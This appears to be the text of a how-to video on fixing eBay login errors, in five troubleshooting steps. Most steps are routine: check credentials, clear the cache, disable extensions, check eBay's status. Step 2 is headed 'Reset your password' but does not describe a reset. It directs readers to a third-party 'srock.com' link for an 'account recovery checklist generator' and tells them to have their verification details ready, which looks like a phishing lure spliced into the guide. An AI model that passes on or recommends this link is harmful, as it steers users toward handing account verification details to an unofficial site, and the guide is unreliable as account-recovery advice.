If you're experiencing login errors on eBay, follow these steps to troubleshoot and resolve the issue effectively. Step 1. Check your credentials. Ensure that you are entering the correct username and password. Double check for any typos and make sure that caps lock is not on. Step 2. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache and cookies. Sometimes stored data can cause login issues. Clear your browser's cache and cookies, then restart the browser and try logging again. Step 4. Disable browser extensions. Certain browser extensions can interfere with website functionality. Temporarily disable any extensions or try logging and using a different browser to see if that resolves the issue. Step 5. Check eBay's status. Occasionally, eBay may experience outages or maintenance. Visit eBay's status page or check their social media for any announcements regarding login issues. If you follow these steps and still cannot log in, consider reaching out to eBay customer support for further assistance.